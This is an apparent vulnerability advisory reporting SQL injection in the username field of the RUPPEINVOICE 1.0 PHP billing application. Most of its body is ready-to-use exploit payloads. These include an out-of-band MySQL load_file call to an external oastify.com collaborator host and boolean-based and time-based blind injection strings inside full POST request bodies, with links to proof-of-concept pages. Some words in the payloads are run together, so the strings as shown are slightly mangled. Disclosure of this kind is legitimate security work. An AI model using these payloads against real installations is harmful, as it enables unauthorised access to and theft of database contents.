Headline
RUPPEINVOICE 1.0 SQL Injection
RUPPEINVOICE version 1.0 suffers from a remote SQL injection vulnerability.
## Title: RUPPEINVOICE-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/09/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+'was submitted in the username parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=zBuveHif'+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''OR NOT 6356=6356 AND 'Eocq'='Eocq&password=g7J!m3v!W2&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=zBuveHif'+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''AND (SELECT 4013 FROM (SELECT(SLEEP(7)))BnHP) AND'bCQt'='bCQt&password=g7J!m3v!W2&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/RUPPEINVOICE-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/ruppeinvoice-10-multiple-sqli.html)## Time spend:00:35:00